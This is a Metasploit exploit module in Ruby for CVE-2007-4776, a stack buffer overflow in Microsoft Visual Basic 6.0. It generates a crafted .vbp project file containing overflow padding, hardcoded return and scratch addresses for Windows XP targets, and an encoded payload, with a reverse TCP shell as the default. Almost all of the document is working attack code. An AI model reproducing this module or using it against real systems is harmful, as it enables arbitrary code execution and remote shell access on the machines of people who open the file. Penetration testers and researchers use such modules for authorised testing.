## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Visual Basic VBP Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Microsoft Visual Basic 6.0. A specially crafted Visual Basic Project (VBP) file containing a long reference line can be used to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Arch' => [ARCH_X86], 'Author' => [ 'Koshi', # Discovery and exploit 'MC', # Metasploit 'bcoles', # Offsets for XP x86-64 ], 'References' => [ [ 'CVE', '2007-4776' ], [ 'CWE', '119' ], [ 'EDB', '4361' ], [ 'OSVDB', '36936' ], [ 'BID', '25629' ] ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp', 'EXITFUNC' => 'process', 'DisablePayloadHandler' => true }, 'Payload' => { 'Space' => 650, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 (x86) (English)', { 'Ret' => 0x0fabd271, # call esp ; vba6.dll 'Scratch' => 0x7ffddfb4 # Address=0x7ffdd000; Size=0x1000; Access=RW; InitialAccess=RW } ], [ 'Windows XP SP1-SP2 (x86-64) (English)', { 'Ret' => 0x0fabd271, # call esp ; vba6.dll 'Scratch' => 0x7efa9010 # Address=0x7efa9000; Size=0x1000; Access=RW; InitialAccess=RW } ], ], 'Privileged' => false, 'DisclosureDate' => '2007-09-04', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SERVICE_DOWN ], 'SideEffects' => [ ARTIFACTS_ON_DISK ], 'Reliability' => [ UNRELIABLE_SESSION ] } ) ) register_options( [ OptString.new('FILENAME', [true, 'The project file name.', 'msf.vbp']), ] ) end def exploit form_name = "Form#{rand(1..9)}" sploit = rand_text_alpha_upper(496) sploit << [target.ret].pack('V') sploit << rand_text_alpha_upper(12) sploit << [target['Scratch']].pack('V') sploit << make_nops(24) sploit << payload.encoded vbp = "Type=Exe\r\n" # We exclude the "Form" field so we don't have to ship a form file (.frm) # along with the project file (.vbp). If the specified form file is not # present within the same directory as the project file, the user is warned # the file does not exist, and is prompted to confirm loading the project. # Selecting "No" halts loading the project and prevents payload execution. # vbp << "Form=#{form_name}.frm\r\n" vbp << 'Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation' vbp << "#{sploit}\r\n" vbp << "Startup=\"#{form_name}\"\r\n" vbp << "Command32=\"\"\r\n" vbp << "Name=\"Project#{rand(1..9)}\"\r\n" vbp << "HelpContextID=\"0\"\r\n" vbp << "CompatibleMode=\"0\"\r\n" vbp << "MajorVer=1\r\n" vbp << "MinorVer=#{rand(1..9)}\r\n" vbp << "RevisionVer=#{rand(1..9)}\r\n" vbp << "AutoIncrementVer=0\r\n" vbp << "ServerSupportFiles=0\r\n" vbp << "VersionCompanyName=\"\"\r\n" vbp << "CompilationType=0\r\n" vbp << "OptimizationType=0\r\n" vbp << "FavorPentiumPro(tm)=0\r\n" vbp << "CodeViewDebugInfo=0\r\n" vbp << "NoAliasing=0\r\n" vbp << "BoundsCheck=0\r\n" vbp << "OverflowCheck=0\r\n" vbp << "FlPointCheck=0\r\n" vbp << "FDIVCheck=0\r\n" vbp << "UnroundedFP=0\r\n" vbp << "StartMode=0\r\n" vbp << "Unattended=0\r\n" vbp << "Retained=0\r\n" vbp << "ThreadPerObject=0\r\n" vbp << "MaxNumberOfThreads=1\r\n" vbp << "[MS Transaction Server]\r\n" vbp << "AutoRefresh=1\r\n" print_status("Creating '#{datastore['FILENAME']}' file for #{target.name} ...") file_create(vbp) end end